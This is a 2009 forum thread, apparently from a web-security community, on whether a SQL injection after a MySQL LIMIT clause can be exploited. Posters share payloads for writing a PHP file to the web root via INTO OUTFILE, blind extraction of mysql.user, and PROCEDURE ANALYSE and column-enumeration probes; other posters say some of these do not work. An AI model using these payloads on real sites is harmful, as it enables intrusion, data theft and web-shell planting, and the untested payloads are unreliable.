I can generate a mysql error on a Limit=100 query at the end of a URL, but can it be attacked?

The error looks something like this:
Error: Failed: SELECT * FROM books_read_hiscores WHERE count>=230 ORDER BY count DESC LIMIT 0,100\'

If mysql is on the same server as php and you can control some of the returned text:
Add some php code into a row of books_read_hiscores (aka some VARCHAR column that asks your name), then run

LIMIT 0,100 INTO OUTFILE '../../../../../path/to/htdocs/randomFileName.php'

where the limit grabs the row with the php code.
Then open hxxp://site/randomFileName.php

---
$emo=addslashes($wrist);



Edited 2 time(s). Last edit at 01/10/2009 06:40PM by barbarianbob.

this wont work because magic quotes seems to be enabled and you definetly need quotes for INTO OUTFILE. maybe I come up with a better idea in the next days when I have my test enviroment available.

Ok, tell me how you do ;).

I think you would succeed if you were in a lucky position, lucky as in the database being in GBK -> [shiflett.org] ... that, if for escaping addslashes was used.

...or maybe find a sql injection in other places you might have missed :)

---
blog [-] microblog

LIMIT 0,100 PROCEDURE ANALYSE(15,2000) might be able to give you more errors (we all love errors, right?).

So we have a few options. If it has more than 255 articles to display in the DB, you can do

LIMIT 0,ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)
LIMIT 0,ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),1,1)
... etc...
<-- To get the ascii value of the characters in the string :-)

You could also go for the semi-blind way :)

LIMIT 0,IF(ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)) > 127,1,2)
<-- If it returns 0 results (or an error message) we got an error (like, no access to mysql.user, for instance). If it returns 1 result, the ascii value of the first character in the username is > 127, if it returns 2, it is < 127. Using this method you can get the value of each character in less than 10 queries (which may seem tiresome, but is way more effective than a real bruteforce attack). You can use a tool sqlmap to automate the process of dumping the info.

etc...

@Pragmatk: would you like sharing an instance in which the ANALYSE() procedure would cause an useful error (except for 1108 error messages, which is not useful)? I'm highly skeptic about it...

---
LIMIT 0,ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)
---

Up to the recent version of mysql, I know none which will accept this type of limit condition...

---
LIMIT 0,IF(ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)) > 127,1,2)
---

o_O I would like to see you testing the above methods.
Before helping other people, try to double check the things you say because you'll only end up confusing them.

---
blog [-] microblog

none of the methods above work :S.

The closest I've gotten is to use PROCEDURE ANALYSE(15,2000), as Pragmatk said, but you can't do much in there, either.

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE(15,2000);
Empty set (0.08 sec)

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE((SELECT 15),2000);
Empty set (0.01 sec)

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE((SELECT 14+1),2000);
ERROR 1108 (HY000): Incorrect parameters to procedure 'ANALYSE'

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE((SELECT IF(1,15,15)),2000);
ERROR 1108 (HY000): Incorrect parameters to procedure 'ANALYSE'

As soon as you do any math (14+1), you get an error. As soon as you try a function, you get an error.
All that's needed to get a blind injection is to run a function, but I've been unable to do so.
Once someone finds a way to execute a function after the LIMIT clause, we will be swimming in vulnerabilities. Since LIMIT doesn't let you put quotes around the number, mysql_real_escape_string() will become ineffective in blocking the injection. Then it will be free blind injections for everyone.

---
$emo=addslashes($wrist);

hmm didnt work dmn, pmed u

Damned, I was mistaken; you guys are right. I'm sorry I sidetracked you there :(
LIMIT is a bitch :/

PROCEDURE ANALYSE is cool though. It doesn't allow subqueries, though, so I can't imagine many situations where you can use it to return data. In a lot of cases it can be extremely nice for retrieving data about the table and queries though. For one, it's good for detecting stacked queries. In some (rare) cases you can also get column types "for free" using it.
It's also neat for making sure you have hole through to a mysql database in those cases where you are in doubt (especially blind stuff).

I played around with this some more. I don't know how useful it is if you only have this injection point, but you can enumerate the amount of columns.

The procedure is pretty much like union select null, [null ...]

limit 5 into @version
limit 5 into @version,@version
limit 5 into @version,@version,@version
etc...

hm nice (note that you can name the vars whatever you like, this has nothing to do with @@version), but unfortunetly you cant do much with the amount of columns. But I couldnt come up with something better yet :S
PROCEDURE ANALYSE is interesting though, I created a small post about it here:
[websec.wordpress.com]
I hope credits are fine, else PM me.
Additionally I managed to crash MySQL4 with this operation, but while having a look at the mysql bugsystem this operation caused alot of trouble in the past, so nothing fancy I guess.



Edited 1 time(s). Last edit at 01/26/2009 11:29AM by Reiners.

I wrote a bit more on extracting data using this.

[pragmatk.geeksgonewild.info]

Have fun!



Edited 1 time(s). Last edit at 02/01/2009 12:44PM by Pragmatk.